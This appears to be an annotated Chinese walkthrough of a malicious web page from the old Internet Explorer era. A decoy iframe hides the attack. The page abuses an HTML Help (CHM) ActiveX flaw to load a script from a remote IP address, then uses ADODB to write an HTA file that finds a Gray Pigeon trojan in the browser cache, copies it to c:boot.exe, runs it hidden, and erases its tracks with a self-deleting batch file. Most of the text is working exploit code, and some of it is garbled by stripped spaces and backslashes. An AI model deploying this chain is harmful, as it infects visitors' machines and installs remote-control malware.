<iframe src="http://www.qq.com/" width="800" height="600"></iframe> <script language=javascript>ie=’fucksnow’;ver=navigator.appVersion;if(!(ver.indexOf(‘NT 5.0′)==-1))ie=’nt’;if(!(ver.indexOf(‘Windows 98′)==-1)){ie=’98’;}location.href=ie+’.htm’;</script>
<iframe src="http://www.qq.com/" width="800" height="600"></iframe> //掩人耳目
<script language=javascript>
ie=’fucksnow’; //定义变量ie=fucksnow
ver=navigator.appVersion; //获得浏览器版本
if(!(ver.indexOf(‘NT 5.0′)==-1)) ie=’nt’; //如果是2k系统则ie=nt
if(!(ver.indexOf(‘Windows 98′)==-1)) {ie=’98’;} //定义变量ie=98
location.href=ie+’.htm’; //重定向到 ie+’.htm’
</script>
<SCRIPTlanguage=VScriptsrc="mmmmm.gif"></SCRIPT> //加载mmmmm.gif,这个其实不是图片,后面会说到
<SCRIPTlanguage=VScriptsrc="xxxxx.pif"></SCRIPT> //加载xxxxx.pif,灰鸽子木马
<HTML><BODY>
<divstyle="display:none">
//利用chm漏洞
<OBJECTid="news140"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAMname="Command"value="RelatedTopics,MENU"><PARAMname="Window"value="$global_ifl">
<PARAMname="Item1"value=’command;/windows/help/apps.chm’);</OBJECT>
<OBJECTid="news162"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAMname="Command"value="RelatedTopics,MENU"><PARAMname="Window"value="$global_ifl">
//利用chm漏洞执行mmmmm.gif里面的脚本程序
<PARAMname="Item1"value=’command;javascript:eval("document.write("<SCRIPTlanguage=JScriptsrc="http://218.106.9.136/inc/mmmmm.gif""+String.fromCharCode(62)+"</SCR"+"IPT"+String.fromCharCode(62))")’>
</OBJECT>
</div>
<SCRIPT>news140.Click();f1=1+1;f1=f1+2;setTimeout("news162.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>
//又是一个障眼法,重定向到http://xuemulove.com/a.gif,文件不存在
<iframesrc="http://xuemulove.com/a.gif"width="0"height="0">
</iframe><BODYonload="window.status=’页面已装载!’">
document.write(‘<html><HEAD><SCRIPTlanguage=JScript>window.moveTo(4000,4000);window.resizeTo(0,0);</SCRIPT></HEAD></html>’); //把弹出窗口移到x,y=4000,4000的位置,另你看不到
//利用ADODB写文件
try{BOSSYU=newActiveXObject("ADODB.Recordset");BOSSYU.Fields.Append("a",200,3000);BOSSYU.Open();BOSSYU.AddNew();BOSSYU.Fields("a").Value="
//写进去的代码
<HTML><BODYonLoad="window.moveTo(4000,4000);">
<HEAD><SCRIPTlanguage=JScript>window.moveTo(4000,4000);window.resizeTo(0,0);</SCRIPT></HEAD>
//利用HTA执行所需要的操作
<HTA:APPLICATIONID=kk3714CAPTION="no"BORDER="none"HEIGHT="0"SHOWINTASKBAR="no"WIDTH="0">
<BODYscroll="no"leftmargin="0"topmargin="0"marginwidth="0"marginheight="0">
<SCRIPTLANGUAGE="JavaScript">
//在打开fucksnow.htm的时候已经加载了xxxxx.pif文件,这时该文件已经在IE的缓存中。由于IE的一些特性,该文件会被保存为xxxxx[1].pif xxxxx[2].pif等类似的文件名,下面的程序子就是为了把他找出来,并执行他
function thanks(b){
try{
varc=new Enumerator(YUri.GetFolder(b).SubFolders);
for(;!c.atEnd();c.moveNext())
{var zI01=c.item().Path+"xxxxx[1].pif";
var z1=c.item().Path+"xxxxx[2].pif";
var f="C:boot.exe";
if(YUri.FileExists(zI01)) //找到木马文件xxxxx[1].pif
{YUri.CopyFile(zI01,f) //copy到 c:boot.exe
w00sh.Run(f,0,false); //执行木马
v=1;break;}
if(YUri.FileExists(z1)) //同上,只不过文件名为xxxxx[2].pif
{YUri.CopyFile(z1,f);
w00sh.Run(f,0,false);
v=1;break;}
thanks(c.item());}}
catch(e){}}
function agree(){
path="c:boOt.bat"; //建立boot.bat批处理
v=kk3714.commandLine;
v=v.substring(1,v.length-2);
var_w=YUri.CreateTextFile(path);
_w.Write(‘@eCho oFf rn:ArnDeL"’+v+’"rnifeXiSt"’+v+’"gOtoArnDEl%0′); //写命令到boot.bat里面,BAT里面的内容:
====================
@echo off
:a del v //删除v , v为该执行文件c:bootlog.hta
if exist v goto a //如果还没删除则转到 a,继续执行删除操作
del 0% //自删除
====================
_w.close();
w00sh.Run(path,0,false);
window.close();
}
//获得IE缓存存放位置以查找xxxxx.pif
varv=0;
try{
varYUri=newActiveXObject("Scripting.FileSystemObject");
varw00sh=newActiveXObject("WScript.Shell");
varcache=w00sh.RegRead("HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerShellFoldersCache");
}catch(e){}
function fish()
{try{if(v==0){thanks(cache+’..’);setTimeout("fish()",4000);}else{agree();}}catch(e){}}
fish();</SCRIPT></BODY></HTML>";
//存为c:bootlog.hta并执行
BOSSYU.Update();}catch(e){}try{BOSSYU.Save("c:bootlog.hta",0);}catch(e){}document.write(‘<objectid="bbs1"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><paramname="Command"value="shortcut"><paramname=item1value=",c:bootlog.hta"></object>
<OBJECTid="bbs2"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><paramname="Command"value="Close"><paramname=kav"value="out"></oBjEct>
<ScRipt>c=1;bbs1.Click();c=1;c=c+5;bbs2.Click();c=c+1;</script>’);